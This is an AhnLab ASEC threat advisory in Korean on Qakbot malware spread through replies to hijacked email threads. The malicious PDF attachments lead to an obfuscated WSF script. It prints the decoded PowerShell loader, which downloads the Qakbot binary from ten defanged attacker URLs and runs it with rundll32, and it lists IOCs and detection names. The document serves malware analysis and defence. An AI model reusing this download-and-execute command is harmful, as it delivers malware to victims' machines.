AhnLab Security Emergency response Center(ASEC)에서는 기존의 이메일을 이용(회신/전달)하는 형태로 악성 PDF파일을 첨부하여 Qakbot 악성코드가 유포되는 정황을 확인하였다.
뱅킹형 악성코드로 알려진 Qakbot은 다양한 매개체를 통해 지속적으로 유포되고 있는 악성코드 중 하나이며, ASEC에서는 기존에도 해당 악성코드의 유포동향을 소개해 온 바 있다.
유포되는 이메일은 다음과 같이 정상 메일을 가로채 악성 파일을 첨부하여 사용자에게 회신한 형태를 띄고 있는데, 수신대상으로는 기존메일의 수신/참조인 메일주소를 활용하였다.
원본 이메일이 오간 시점은 2018~2022년으로 매우 다양한 양상을 보이고 최근 시점의 이메일은 아닌 것으로 확인되었다.
관련이 없는 원문에 대해 첨부파일과 함께 전달되는 본문의 내용은 어딘가 어색한 형태를 띄지만, 첨부파일 열람을 유도하는 내용으로 기재되어 있다.
해당 이메일을 수신한 사용자의 경우, 정상적인 회신으로 판단하여 큰 의심 없이 첨부파일을 실행할 수 있어 주의가 필요하다.

그림 1) 악성 PDF를 첨부한 이메일 (1)

그림 2) 악성 PDF를 첨부한 이메일 (2)

그림 3) 악성 PDF를 첨부한 이메일 (3)
이메일에 첨부된 PDF 파일명은 ‘UT.PDF’, ‘RA.PDF’, ‘NM.PDF’ 와 같이 자동화를 통해 생성한 것으로 추정되는 랜덤문자의 형태를 띄며, PDF 파일을 실행하면 아래와 같이 Microsoft Azure 로고와 함께 Open 버튼 클릭을 유도하는 메세지가 존재하는 것을 알 수 있다.
Open 버튼을 클릭하면 악성 URL로 연결이 되고, 해당 URL에 연결이 가능할 경우 암호화 압축된 ZIP파일을 다운로드 한다.
암호가 걸린 ZIP파일은 PDF 본문에 기재된 ‘Password: 755’ 를 이용하여 압축해제가 가능하다.

그림 4) 이메일에 첨부된 PDF파일 실행화면

그림 5) PDF 내부 URL에서 다운로드 되는 압축파일
압축을 해제하여 WSF 파일을 확인해보면 아래와 같이 AntiVirus 제품의 진단을 우회하기 위해 더미 텍스트와 함께 난독화 되어있는 스크립트 코드를 확인할 수 있다.
유의미한 스크립트 코드는 <job> 태그 이후에 존재한다.

그림 6) 더미 데이터와 함께 난독화 된 WSF 스크립트
WSF 파일을 실행할 경우 파워쉘 프로세스를 통해 암호화된 데이터 커맨드를 실행하는데, 해당 데이터를 복호화 하면 다음과 같다.
연결이 유효한 URL에서 Qakbot 바이너리를 TMP 경로에 undersluice.Calctuffs 파일명으로 다운로드 후 rundll32.exe 프로세스를 통해 실행하는 것을 알 수 있다.
powershell.exe” -ENC “Start-Sleep -Seconds 2; $Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); foreach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}} catch {Start-Sleep -Seconds 2;}}
현재는 연결이 되지 않는 URL 이지만, 내/외부 인프라를 통해 연결이 유효한 당시에 해당 URL에서 Qakbot 바이너리를 유포한 정황을 확인할 수 있었다.
관련하여 유사한 포맷으로 다수의 악성 이메일이 유포되고 있으므로, 출처가 불분명한 이메일 열람을 주의해야 하며 사용하고 있는 AntiVirus 제품을 최신버전으로 업데이트하여 사용할 것을 권고한다.
[파일진단]
Phishing/PDF.Agent (2023.04.07.02)
Phishing/PDF.Generic (2023.04.07.03)
Phishing/PDF.Malurl (2023.04.08.00)
Trojan/WSF.PSRunner (2023.04.08.00)
Trojan/Win.Evo-gen.C5403438 (2023.03.31.02)
Trojan/Win.Qakbot.C5406010 (2023.04.06.02)
Trojan/Win.Evo-gen.C5406771 (2023.04.07.02)
[IOC]
hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp
hxxps://qassimnews[.]com/yweNej/kQBDu
hxxps://stealingexcellence[.]com/rVR9r/yahxNk
hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil
hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J
hxxps://t-lows[.]com/ggAJ2m/kXpW59tm
hxxps://seicas[.]com/KvtM0/Uj3atvfT4E
hxxps://farmfutures[.]in/tlUtBc/IYj0K1
hxxps://alzheimersdigest[.]net/ZKpva/55C63K
hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc
19c1526182fe5ed0f1abfafc98d84df9
c9ab1cd04e796fd7f084a1dd2d40cc2d
b57532c33d7fead3105e9312cb544e11
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보
[…] FORRÁS […]
[…] 사용자 PC에 Qakbot 악성코드가 다운로드 된다. 관련 상세 정보는 ASEC 블로그(https://asec.ahnlab.com/ko/51109/)에서 다룬 바 […]